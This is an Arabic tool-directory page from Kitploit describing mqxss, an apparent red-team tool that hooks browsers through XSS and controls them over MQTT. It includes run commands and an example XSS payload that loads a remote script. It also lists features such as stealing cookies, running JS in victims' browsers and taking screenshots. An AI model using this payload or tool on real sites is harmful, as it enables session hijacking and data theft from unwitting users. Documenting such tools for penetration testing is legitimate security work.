Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mqxss — اتصال المتصفح المُخترق عبر MQTT | Kitploit
أدوات/GitHubGitHub/grampae/mqxss
توليد الحمولةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubgrampae/mqxss

mqxss

اتصال المتصفح المُخترق عبر MQTT

عرض المستودع
8منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

mqxss v0.2

mqxss يعمل كعميل للتواصل مع المتصفحات المُربوطة عبر MQTT

Screenshot from 2023-07-03 15-15-35

الفائدة من استخدام هذا بدلاً من beef أو xsshunter هي أنه بالإضافة إلى استضافة حمولة js، لا يوجد أي إعداد للبنية التحتية، يمكنك استخدام وسيط عام (لكنه يستخدم حالياً التعتيم، التشفير قيد التطوير).

ستتواصل المتصفحات المُربوطة عبر موضوع MQTT على الوسيط الذي تحدده، وهناك العديد من الوسائط العامة/المجانية لاختبار ذلك.

يستخدم العميل مكتبة paho.mqtt الخاصة ببايثون بينما تستخدم حمولة js ملف 'mqttws31.min.js' الذي يتم جلبه من هنا 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.


التعليمات

Screenshot from 2024-01-17 11-34-59

لتوليد حمولة JS لربط المتصفحات بها، قم بتعيين العلم -g وقت التشغيل مع متغيرات الوسيط والمنفذ والموضوع. سيؤدي ذلك إلى إنشاء الحمولة في مجلد /js/.

لتشغيل العميل قم بتوفير الوسيط والمنفذ والموضوع كما يلي

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

لتشغيل العميل ببيانات الاعتماد قم بتوفير الوسيط والمنفذ واسم المستخدم وكلمة المرور والموضوع كما يلي

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

أرسل حمولة XSS الخاصة بك إلى الضحية أثناء تشغيل عميل mqxss، مثال: '"><script src=https://example.com/x.js async></script> أو شيء مشابه، إذا كان الهدف عرضة للثغرة، فيجب أن تحصل على إشعار بأن المتصفح قد اتصل مع بعض التفاصيل الأساسية بما في ذلك ملفات تعريف الارتباط وما إلى ذلك.

a


الميزات:

  • تستخدم حمولة js بروتوكول MQTT بجودة الخدمة QoS 1 والوصية الأخيرة (Last Will)، وسيتم إشعار mqxss بحالات قطع الاتصال أو الاتصال التي تحدث أثناء عدم اتصال العميل بالوسيط
  • توليد حمولة js وقت التشغيل لربط المتصفحات بها
  • يعمل حالياً فقط مع وسائط MQTT التي تستخدم websockets آمنة
  • فتح موقع المتصفح المُربوط مع ملفات تعريف الارتباط الملتقطة في المتصفح لسهولة الاستخدام
  • عند الربط، يلتقط ملفات تعريف الارتباط، عنوان IP، نوع الجهاز، وكيل المستخدم
  • عرض المتصفحات المُربوطة سابقاً (غير المُربوطة حالياً)
  • إرسال js إلى المتصفحات المُربوطة حالياً والحصول على الرد إذا كان متاحاً
  • لقطة شاشة للمتصفح المُربوط
  • تعيين اسم المستخدم وكلمة المرور للوسائط التي تتطلب ذلك وقت التشغيل
  • إشعار Pushover عن طريق تعيين متغيري ptoken و userkey في mqxss.py، ثم استخدام علم سطر الأوامر -po
تنزيل الأداة